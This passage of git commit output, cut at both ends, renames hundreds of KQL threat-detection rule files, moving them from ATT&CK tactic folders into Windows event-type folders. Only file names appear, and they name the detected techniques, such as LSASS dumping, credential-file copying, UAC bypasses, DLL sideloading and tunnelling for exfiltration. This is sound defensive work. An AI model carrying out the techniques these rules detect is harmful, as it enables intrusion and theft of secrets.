windows/file/file_event}/suspicious_binaries_and_scripts_in_public_folder.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/suspicious_binary_writes_via_anydesk.kql (100%) rename KQL/rules/{Impact => windows/file/file_event}/suspicious_creation_txt_file_in_user_desktop.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/suspicious_creation_with_colorcpl.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/suspicious_deno_file_written_from_remote_source.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/suspicious_desktop_ini_action.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/suspicious_desktopimgdownldr_target_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/suspicious_double_extension_files.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/suspicious_executable_file_creation.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/suspicious_file_created_in_outlook_temporary_directory.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/suspicious_file_created_in_perflogs.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/suspicious_file_created_via_onenote_application.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/suspicious_file_creation_in_uncommon_appdata_folder.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/suspicious_file_drop_by_exchange.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/suspicious_file_write_to_sharepoint_layouts_directory.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/suspicious_file_write_to_webapps_root_directory.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/file/file_event}/suspicious_files_in_default_gpo_folder.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/suspicious_get_variable_exe_creation.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/suspicious_interactive_powershell_as_system.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/suspicious_lnk_double_extension_file_created.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/suspicious_msexchangemailboxreplication_aspx_write.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/suspicious_outlook_macro_created.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/suspicious_procexp152_sys_file_created_in_tmp.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/suspicious_scheduled_task_write_to_system32_tasks.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/suspicious_screensaver_binary_file_creation.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/suspicious_startup_folder_persistence.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/teamviewer_remote_session.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uac_bypass_abusing_winsat_path_parsing_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uac_bypass_using_consent_and_comctl32_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uac_bypass_using_eventvwr.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/uac_bypass_using_idiagnostic_profile_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uac_bypass_using_ieinstal_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uac_bypass_using_msconfig_token_modification_file.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/file/file_event}/uac_bypass_using_net_code_profiler_on_mmc.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uac_bypass_using_ntfs_reparse_point_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uac_bypass_using_windows_media_player_file.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/uefi_persistence_via_wpbbin_filecreation.kql (100%) rename KQL/rules/{Resource Development => windows/file/file_event}/uncommon_file_created_in_office_startup_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uncommon_file_creation_by_mysql_daemon_process.kql (100%) rename KQL/rules/{Resource Development => windows/file/file_event}/vhd_image_download_via_browser.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/visual_studio_code_tunnel_remote_file_creation.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/vscode_powershell_profile_modification.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/werfault_lsass_process_memory_dump.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/windows_binaries_write_suspicious_extensions.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/windows_shell_scripting_application_file_write_to_suspicious_folder.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/windows_terminal_profile_settings_modification_by_uncommon_process.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/winrar_creating_files_in_startup_locations.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/winsxs_executable_file_creation_by_non_system_process.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/wmi_persistence_script_event_consumer_file_write.kql (100%) rename KQL/rules/{Lateral Movement => windows/file/file_event}/wmiexec_default_output_file.kql (100%) rename 
KQL/rules/{Execution => windows/file/file_event}/wmiprvse_wbemcomn_dll_hijack_file.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/writing_local_admin_share.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/wscript_or_cscript_dropper_file.kql (100%) rename KQL/rules/{Execution => windows/image_load}/abusable_dll_potential_sideloading_from_suspicious_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/amsi_dll_loaded_via_lolbin_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/aruba_network_service_potential_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/baaupdate_exe_suspicious_dll_load.kql (100%) rename KQL/rules/{Execution => windows/image_load}/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql (100%) rename KQL/rules/{Execution => windows/image_load}/clr_dll_loaded_via_office_applications.kql (100%) rename KQL/rules/{Credential Access => windows/image_load}/credui_dll_loaded_by_uncommon_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/dll_load_by_system_process_from_suspicious_locations.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/dll_loaded_from_suspicious_location_via_cmspt_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/dll_sideloading_of_shellchromeapi_dll.kql (100%) rename KQL/rules/{Execution => windows/image_load}/dotnet_assembly_dll_loaded_via_office_application.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/dotnet_clr_dll_loaded_by_scripting_applications.kql (100%) rename KQL/rules/{Privilege Escalation => windows/image_load}/fax_service_dll_search_order_hijack.kql (100%) rename KQL/rules/{Execution => windows/image_load}/gac_dll_loaded_via_office_applications.kql (100%) rename 
KQL/rules/{Command and Control => windows/image_load}/hacktool_silenttrinity_stager_dll_load.kql (100%) rename KQL/rules/{Impact => windows/image_load}/load_of_rstrtmgr_dll_by_a_suspicious_process.kql (100%) rename KQL/rules/{Impact => windows/image_load}/load_of_rstrtmgr_dll_by_an_uncommon_process.kql (100%) rename KQL/rules/{Execution => windows/image_load}/microsoft_excel_add_in_loaded_from_uncommon_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/microsoft_office_dll_sideload.kql (100%) rename KQL/rules/{Execution => windows/image_load}/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql (100%) rename KQL/rules/{Execution => windows/image_load}/mmc_loading_script_engines_dlls.kql (100%) rename KQL/rules/{Execution => windows/image_load}/pcre_net_package_image_load.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_7za_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_antivirus_software_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_appverifui_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_avkkid_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_azure_browser_sso_abuse.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_ccleanerdu_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_ccleanerreactivator_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_chrome_frame_helper_dll_sideloading.kql (100%) rename KQL/rules/{Lateral Movement => windows/image_load}/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_dll_sideloading_of_dbgcore_dll.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/image_load}/potential_dll_sideloading_of_dbghelp_dll.kql (100%) rename KQL/rules/{Privilege Escalation => windows/image_load}/potential_dll_sideloading_of_dbgmodel_dll.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/image_load}/potential_dll_sideloading_of_mpsvc_dll.kql (100%) rename KQL/rules/{Privilege Escalation => windows/image_load}/potential_dll_sideloading_of_mscorsvc_dll.kql (100%) rename KQL/rules/{Privilege Escalation => windows/image_load}/potential_dll_sideloading_using_coregen_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_dll_sideloading_via_classicexplorer32_dll.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_dll_sideloading_via_comctl32_dll.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_dll_sideloading_via_jsschhlp.kql (100%) rename KQL/rules/{Privilege Escalation => windows/image_load}/potential_dll_sideloading_via_vmware_xfer.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_eacore_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_edputil_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_goopdate_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_iviewers_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_libvlc_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_mfdetours_dll_sideloading.kql (100%) rename KQL/rules/{Privilege Escalation => windows/image_load}/potential_mpclient_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_rcdll_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => 
windows/image_load}/potential_rjvplatform_dll_sideloading_from_default_location.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_rjvplatform_dll_sideloading_from_non_default_location.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_roboform_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_shelldispatch_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_smadhook_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_solidpdfcreator_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_system_dll_sideloading_from_non_system_locations.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_vivaldi_elf_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_waveedit_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_wazuh_security_platform_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_wwlib_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql (100%) rename KQL/rules/{Execution => windows/image_load}/powershell_core_dll_loaded_by_non_powershell_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/powershell_core_dll_loaded_via_office_application.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/python_image_load_by_non_python_process.kql (100%) rename KQL/rules/{Execution => windows/image_load}/remote_dll_load_via_rundll32_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/suspicious_volume_shadow_copy_vss_ps_dll_load.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/suspicious_volume_shadow_copy_vssapi_dll_load.kql (100%) rename KQL/rules/{Execution => 
windows/image_load}/suspicious_wsman_provider_image_loads.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/system_control_panel_item_loaded_from_uncommon_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/third_party_software_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/time_travel_debugging_utility_usage_image.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/trusted_path_bypass_via_windows_directory_spoofing.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/uac_bypass_using_iscsicpl_imageload.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/uac_bypass_with_fake_dll.kql (100%) rename KQL/rules/{Execution => windows/image_load}/vba_dll_loaded_via_office_application.kql (100%) rename KQL/rules/{Lateral Movement => windows/image_load}/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql (100%) rename KQL/rules/{Privilege Escalation => windows/image_load}/wmi_persistence_command_line_event_consumer.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/wmic_loading_scripting_libraries.kql (100%) rename KQL/rules/{Execution => windows/image_load}/wmiprvse_wbemcomn_dll_hijack.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/communication_to_localtonet_tunneling_service_initiated.kql (100%) rename KQL/rules/{Exfiltration => windows/network_connection}/communication_to_ngrok_tunneling_service_initiated.kql (100%) rename KQL/rules/{Persistence => windows/network_connection}/communication_to_uncommon_destination_ports.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/local_network_connection_initiated_by_script_interpreter.kql (100%) rename KQL/rules/{Privilege Escalation => windows/network_connection}/microsoft_sync_center_suspicious_network_connections.kql (100%) rename KQL/rules/{Command and Control => 
windows/network_connection}/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/network_communication_initiated_to_portmap_io_domain.kql (100%) rename KQL/rules/{Impact => windows/network_connection}/network_communication_with_crypto_mining_pool.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/network_connection_initiated_by_addinutil_exe.kql (100%) rename KQL/rules/{Execution => windows/network_connection}/network_connection_initiated_by_eqnedt32_exe.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/network_connection_initiated_by_imewdbld_exe.kql (100%) rename KQL/rules/{Execution => windows/network_connection}/network_connection_initiated_by_regsvr32_exe.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql (100%) rename KQL/rules/{Exfiltration => windows/network_connection}/network_connection_initiated_to_btunnels_domains.kql (100%) rename KQL/rules/{Exfiltration => windows/network_connection}/network_connection_initiated_to_cloudflared_tunnels_domains.kql (100%) rename KQL/rules/{Exfiltration => windows/network_connection}/network_connection_initiated_to_devtunnels_domain.kql (100%) rename KQL/rules/{Exfiltration => windows/network_connection}/network_connection_initiated_to_mega_nz.kql (100%) rename KQL/rules/{Exfiltration => windows/network_connection}/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql (100%) create mode 100644 KQL/rules/windows/network_connection/network_connection_initiated_via_finger_exe.kql rename KQL/rules/{Privilege Escalation => 
windows/network_connection}/network_connection_initiated_via_notepad_exe.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/office_application_initiated_network_connection_over_uncommon_ports.kql (100%) rename KQL/rules/{Execution => windows/network_connection}/office_application_initiated_network_connection_to_non_local_ip.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/outbound_network_connection_initiated_by_cmstp_exe.kql (100%) rename KQL/rules/{Execution => windows/network_connection}/outbound_network_connection_initiated_by_microsoft_dialer.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/outbound_network_connection_initiated_by_script_interpreter.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/outbound_network_connection_to_public_ip_via_winlogon.kql (100%) rename KQL/rules/{Lateral Movement => windows/network_connection}/outbound_rdp_connections_over_non_standard_tools.kql (100%) rename KQL/rules/{Persistence => windows/network_connection}/potentially_suspicious_malware_callback_communication.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/potentially_suspicious_network_connection_to_notion_api.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/potentially_suspicious_wuauclt_network_connection.kql (100%) rename KQL/rules/{Exfiltration => windows/network_connection}/process_initiated_network_connection_to_ngrok_domain.kql (100%) rename KQL/rules/{Discovery => windows/network_connection}/python_initiated_connection.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/rdp_over_reverse_ssh_tunnel.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/rdp_to_http_or_https_target_ports.kql (100%) rename 
KQL/rules/{Defense Evasion => windows/network_connection}/regasm_exe_initiating_network_connection_to_public_ip.kql (100%) rename KQL/rules/{Persistence => windows/network_connection}/remote_access_tool_anydesk_incoming_connection.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/rundll32_internet_connection.kql (100%) rename KQL/rules/{Execution => windows/network_connection}/silenttrinity_stager_msbuild_activity.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/suspicious_dropbox_api_usage.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/suspicious_network_connection_binary_no_commandline.kql (100%) rename KQL/rules/{Discovery => windows/network_connection}/suspicious_network_connection_to_ip_lookup_service_apis.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/suspicious_non_browser_network_communication_with_google_api.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/suspicious_non_browser_network_communication_with_telegram_api.kql (100%) rename KQL/rules/{Exfiltration => windows/network_connection}/suspicious_outbound_smtp_connections.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/suspicious_wordpad_outbound_connections.kql (100%) rename KQL/rules/{Discovery => windows/network_connection}/uncommon_connection_to_active_directory_web_services.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/uncommon_network_connection_initiated_by_certutil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/uncommon_outbound_kerberos_connection.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/7zip_compressing_dump_files.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/aadinternals_powershell_cmdlets_execution_proccesscreation.kql (100%) rename KQL/rules/{Persistence => 
windows/process_creation}/abuse_of_service_permissions_to_hide_services_via_set_service.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/abused_debug_privilege_by_arbitrary_parent_processes.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/abusing_print_executable.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/active_directory_database_snapshot_via_adexplorer.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/active_directory_structure_export_via_csvde_exe.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/active_directory_structure_export_via_ldifde_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/add_insecure_download_source_to_winget.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/add_new_download_source_to_winget.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/add_potential_suspicious_new_download_source_to_winget.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/add_safeboot_keys_via_reg_utility.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/add_windows_capability_via_powershell_cmdlet.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/addinutil_exe_execution_from_uncommon_directory.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/agentexecutor_powershell_execution.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/all_backups_deleted_via_wbadmin_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/always_install_elevated_msi_spawned_cmd_and_powershell.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/always_install_elevated_windows_installer.kql (100%) rename 
KQL/rules/{Execution => windows/process_creation}/application_removed_via_wmic_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/application_terminated_via_wmic_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/arbitrary_binary_execution_using_gup_utility.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/arbitrary_file_download_via_configsecuritypolicy_exe.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/arbitrary_file_download_via_imewdbld_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/arbitrary_file_download_via_msedge_proxy_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/arbitrary_file_download_via_msohtmed_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/arbitrary_file_download_via_mspub_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/arbitrary_file_download_via_presentationhost_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/arbitrary_file_download_via_squirrel_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/arbitrary_msi_download_via_devinit_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/arbitrary_shell_command_execution_via_settingcontent_ms.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/aspnetcompiler_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/assembly_loading_via_cl_loadassembly_ps1.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql (100%) rename KQL/rules/{Collection => 
windows/process_creation}/audio_capture_via_powershell.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/audio_capture_via_soundrecorder.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/audit_policy_tampering_via_auditpol.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/audit_policy_tampering_via_nt_resource_kit_auditpol.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/automated_collection_command_prompt.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/base64_encoded_powershell_command_detected.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/base64_mz_header_in_commandline.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/binary_proxy_execution_via_dotnet_trace_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/bitlockertogo_exe_execution.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/boot_configuration_tampering_via_bcdedit_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/browser_execution_in_headless_mode.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/browser_started_with_remote_debugging.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/bypass_uac_via_cmstp.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/bypass_uac_via_fodhelper_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/bypass_uac_via_wsreset_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/c_il_code_compilation_via_ilasm_exe.kql (100%) rename KQL/rules/{Execution => 
windows/process_creation}/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/capture_credentials_with_rpcping_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/certificate_exported_via_certutil_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/certificate_exported_via_powershell.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/change_default_file_association_to_executable_via_assoc.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/change_default_file_association_via_assoc.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/change_powershell_policies_to_an_insecure_level.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/changing_existing_service_imagepath_value_via_reg_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/chopper_webshell_process_pattern.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/chromium_browser_headless_execution_to_mockbin_like_site.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/chromium_browser_instance_executed_with_custom_extension.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/cloudflared_portable_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/cloudflared_quick_tunnel_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/cloudflared_tunnel_connections_cleanup.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/cloudflared_tunnel_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/cmd_exe_missing_space_characters_execution_anomaly.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/cmstp_execution_process_creation.kql (100%) rename 
KQL/rules/{Execution => windows/process_creation}/cmstp_uac_bypass_via_com_object_access.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/cobaltstrike_load_by_rundll32.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/code_execution_via_pcwutl_dll.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/codepage_modification_via_mode_com_to_russian_language.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/com_object_execution_via_xwizard_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/command_line_execution_with_suspicious_url_and_appdata_strings.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/compressed_file_creation_via_tar_exe.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/compressed_file_extraction_via_tar_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/computer_password_change_via_ksetup_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/computer_system_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/conhost_exe_commandline_path_traversal.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/conhost_spawned_by_uncommon_parent_process.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/console_codepage_lookup_via_chcp.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/control_panel_items.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/convertto_securestring_cmdlet_usage_via_commandline.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/copy_from_or_to_admin_share_or_sysvol_folder.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/copy_from_volumeshadowcopy_via_cmd_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/copying_sensitive_files_with_credential_data.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/createdump_process_dump.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/csc_exe_execution_form_potentially_suspicious_parent.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/cscript_wscript_potentially_suspicious_child_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/cscript_wscript_uncommon_script_extension_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/curl_download_and_execute_combination.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/curl_web_request_with_potential_custom_user_agent.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/data_copied_to_clipboard_via_clip_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/data_export_from_mssql_table_via_bcp_exe.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/delete_all_scheduled_tasks.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/delete_important_scheduled_task.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/deleted_data_overwritten_via_cipher_exe.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql (100%) rename KQL/rules/{Privilege Escalation => 
